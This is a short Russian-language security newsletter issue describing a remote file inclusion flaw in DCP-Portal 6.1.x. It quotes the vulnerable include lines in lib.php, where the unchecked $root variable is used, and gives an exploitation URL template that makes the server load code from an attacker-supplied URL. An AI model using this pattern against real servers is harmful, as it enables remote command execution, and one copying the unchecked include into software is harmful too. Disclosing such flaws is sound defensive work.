Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в DCP-Portal.


Компьютер для продвинутых пользователей
В этом выпуске:
DCP-Portal
ПО: DCP-Portal
Версия: 6.1.х

Уязвимость:
Уязвимость заключается в возможности выполнить удаленную команду на сервере.
Сам ошибочный код содержится в файле lib.php:
include ("$root/library/lib_nav.php");
include ("$root/library/lib_mods.php");
include ("$root/library/lib_admin.php");
include ("$root/library/lib_3rd.php");
При этом переменная $root не проверяется.
Использование:
http://example/[dp_path]/library/lib.php?root=[cmd_url]
Не забудьте проголосовать за выпуск!
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
Меня можно найти: ICQ - 273214003

e-mail - isdmi1::mail.ru

В избранное